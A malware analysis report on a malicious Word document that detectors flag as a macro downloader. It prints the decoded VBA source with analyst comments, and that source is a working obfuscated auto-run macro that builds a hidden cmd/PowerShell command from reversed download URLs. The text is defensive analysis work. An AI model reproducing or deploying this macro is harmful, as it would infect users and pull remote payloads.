Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4819808ef264aad4…

MALICIOUS

Office (OLE)

73.4 KB Created: 2018-09-07 18:39:00 Authoring application: Microsoft Office Word First seen: 2018-10-07
MD5: 47e0c4fc48553c01b126e6357ec10a90 SHA-1: ff8b5afe8cfefbfddf8864fd420fc7b72bd4d077 SHA-256: 4819808ef264aad474d9a2a28d0e48645b807ea281f033ee823f661417841e43
Risk Score: 182

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains VBA macros, including a Document_Open macro, a common technique for executing malicious code as soon as the document is opened. The critical-severity heuristic for a Shell() call in VBA indicates that the macro attempts to execute an external command. The ClamAV detection 'Doc.Downloader.Valyria-6680505-0' further confirms its malicious nature as a downloader. The macro's obfuscation and its use of Shell() strongly suggest that it is designed to download and execute a second-stage payload.

Heuristics 5

  • ClamAV: Doc.Downloader.Valyria-6680505-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Valyria-6680505-0
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Document_Open macro high OLE_VBA_DOCOPEN
    Document_Open macro
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body) — a standard OOXML schema namespace reference, not a download location; it should not be treated as an indicator of compromise.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6373 bytes
SHA-256: 4b55b674e9643e6c959618ac87cc1416be2acebcd1a15695030bcbba6e46797d
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "LCQvfljRadzz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
' Auto-executing entry point: Word runs Document_Open when the file is opened
' (heuristic OLE_VBA_DOCOPEN). The next four physical lines form ONE statement,
' "On Error Resume Next", split with line continuations ("_") so the keyword
' sequence never appears on a single line; it silences every runtime error below.
On _
Error _
Resume _
Next
' Padding: Month() is called as a statement on a concatenated non-date string.
' It either raises an error that the handler above swallows or discards its
' result; either way these lines have no effect and exist only to bury the
' Shell call among noise.
   Month CStr("4299" + "1015" + "344739718" + "fw")
   Month CStr("494632986" + "m" + "XsFkqi" + "wiFl")
   Month CStr("302754387" + "8047" + "fC" + "aQoAurBml")
   Month CStr("3945" + "384305426")
' The only effective statement (heuristic OLE_VBA_SHELL): the command line is
' assembled from seven pieces and run with a hidden window (vbHide). mimliu and
' DcjVIjjr are functions defined later in this extract; the other five names are
' not in the visible excerpt and presumably come from modules past the
' truncation point — TODO confirm against the full extracted script.
Shell CStr(RiJIkbJQwQQG) + CStr(UolhuRLLLP) + mimliu + DcjVIjjr + MiCwECkcF + CStr(uoTkiSit) + CStr(FDVFTtQ), CStr(vbHide)
' Trailing padding, same no-op pattern as above.
   Month CStr("HTXAcFChTCzFj" + "ERWwHXNXDHLiz")
   Month CStr("zIHijPQotHdvlJ" + "JUh")
   Month CStr("7566" + "234288499")
   Month CStr("sVwPOn" + "or" + "jlLrTwVHQ" + "74008461")
End Sub



Attribute VB_Name = "hEcrcMMoNMqHzl"
Function mimliu()
' Builds one fragment of the command line that Document_open passes to Shell.
' Takes no arguments. Returns the six string variables assigned below, joined
' in order. The only side effects are the runtime errors from the Month()
' padding, which the error handler below discards.

' Obfuscated "On Error Resume Next" (one statement over four lines).
On _
Error _
Resume _
Next
' Padding (see Document_open): Month() on a non-date string has no effect
' under On Error Resume Next.
Month CStr("udYQatkGGNcP" + "dwib" + "505" + "4462")
   Month CStr("8532" + "l" + "4573" + "UMRmihQtItpwMW")
   Month CStr("371611646" + "9431" + "37462952" + "510133015")
   Month CStr("6" + "MfuL")
   Month CStr("jktHwS" + "599" + "iLMAHJ" + "6651")
' Chr() over integer sums hides literal characters from simple string scans:
' 4+2+3+13+77 = 99 ("c"), 3+1+2+9+52 = 67 ("C"), 1+0+1+4+28 = 34 (double
' quote). This fragment therefore opens a cmd.exe invocation with delayed
' variable expansion (/V) and a quoted /C command. Detection note: arithmetic
' inside Chr() is itself a useful hunting pattern for this family.
mDGUEi = Chr(4 + 2 + 3 + 13 + 77) + "md " + "/V" + "/" + Chr(3 + 1 + 2 + 9 + 52) + Chr(1 + 0 + 1 + 4 + 28) + "^s" + "^e^t " + "^5" + "^7TU= " + " "
Month CStr("ZPouGKwWL" + "122672491")
   Month CStr("WsECcOnYp" + "wpRQOI" + "UXbbLfRFBDf" + "HUiw")
   Month CStr("CZWnLF" + "RYO" + "8841" + "5290")
' The remaining fragments are caret-escaped cmd.exe text (cmd strips "^" when
' it parses the line), and several read as reversed tokens (e.g. "hctac" for
' "catch"), consistent with a reversed payload being unscrambled at run time —
' TODO confirm by decoding the full extracted script, which is truncated here.
wlRuLiU = " ^" + " ^   " + "^ ^ ^ " + "^ ^ " + "^ " + "^  " + "^  " + "^}^}{" + "h" + Chr(4 + 2 + 3 + 13 + 77) + "t^a" + Chr(4 + 2 + 3 + 13 + 77) + "^}^;k^a"
Month CStr("R" + "k" + "6875" + "YhsSUwzuT")
   Month CStr("ws" + "3405" + "24280871" + "KZfJwH")
   Month CStr("bLIbhNTsj" + "MjRhLWPtHCRDdP" + "NO" + "435584444")
   Month CStr("8596" + "NIpmZMAwk" + "LuuRdDFcZz" + "112415873")
UYjhQuBFw = "er^b" + ";NWB^" + "$ " + "^me^t" + "I^-^" + "ek^o" + "vn" + "I^;)N" + "^W^B^$" + " ," + "n^PF" + "^"
Month CStr("8320" + "470979074")
   Month CStr("M" + "k")
   Month CStr("306108299" + "322285141")
CZfkvVn = "$" + "(" + "^e^l" + "^i^" + "Fd^a^ol" + "n^woD.^" + "w^S" + "^" + "I" + "${^yr"
Month CStr("5374" + "kBtoSESP")
   Month CStr("1435" + "Awph")
bKvWVnbG = "^t^{" + ")w" + "z^" + "j^$ n^i" + " " + "n^P^F^$" + "(^h" + Chr(4 + 2 + 3 + 13 + 77) + "^a^" + "ero^f" + ";"
Month CStr("cZlClYD" + "383556653")
   Month CStr("Q" + "320568444")
   Month CStr("o" + "c" + "Ic" + "lh")
   Month CStr("jJiXM" + "399402295" + "luwjrUMujMXnLf" + "zljT")
dFmFVp = "^'e" + "x^e.^'^" + "+o" + "^Mr^" + "$^+'^" + "\^'^+"
' Join the fragments in assignment order; this is the function's return value,
' which Document_open splices between the other Shell() operands.
mimliu = mDGUEi + wlRuLiU + UYjhQuBFw + CZfkvVn + bKvWVnbG + dFmFVp
' Trailing padding, no effect on the returned string.
   Month CStr("vNmX" + "hPNYPkwWA" + "2369" + "3350")
   Month CStr("Oj" + "uCSjhMNjmOVDJ")
   Month CStr("XwDiNJVMiG" + "415465976" + "8710" + "457062183")
End Function
Function DcjVIjjr()

On _
Error _
Resume _
Next
Month CStr("5930" + "XjvfS")
   Month CStr("DQlYKORUrFLLa" + "486001006" + "YaTBdVzn" + "qlUtAJWLpKIMHz")
   Month CStr("692" + "5833" + "atqlFzsU" + "7021")
   Month CStr("151698440" + "f")
FcGuwWmuZNi = Chr(4 + 2 + 3 + 13 + 77) + "i^l^" + "bu^p^:v" + "n^e^$" + "^=N" + "W" + "^B$;" + "^'0^" + "9^7' " + "^"
Month CStr("H" + "njjPTzMffr")
   Month CStr("304285060" + "WARiRcwjYOQAQ")
   Month CStr("8402" + "wP" + "377075714" + "vmpUQL")
HYTtiZ = "=^ o^" + "Mr$;)" + "'@^'(ti" + "lp^S.^'" + "^k^" + "W/^k" + "^d" + "^.^xe^" + "lfn^i^" + "m^da//" + "^:" + "ptth^@" + Chr(3 + 1 + 2 + 9 + 52)
Month CStr("9343" + "t" + "drTwpMwn" + "k")
   Month CStr("821" + "S" + "fP" + "l")
   Month CStr("qXS" + "JOB" + "331790607" + "uC")
zqGBMmd = "^z15" + "xF^z/" + "y^m." + "^m^" + "o" + Chr(4 + 2 + 3 + 13 + 77) + ".^a" + "^" + "t^" + "i" + "na" + "^m^a//:"
Month CStr("chdbY" + "F" + "daLAoXthfA" + "2779")
MwfWKpjj = "p^tth" + "@4n^Ig/" + "or^.^s" + "^e^" + "diu^gse" + "ru^ma" + "r^am/" + "/" + "^:"
Month CStr("tbHIj" + "jjlQVrIOqo" + "lC" + "157678031")
   Month CStr("120540778" + "ZBsJqJjI")
   Month CStr("i" + "WS")
   Month CStr(
... (truncated)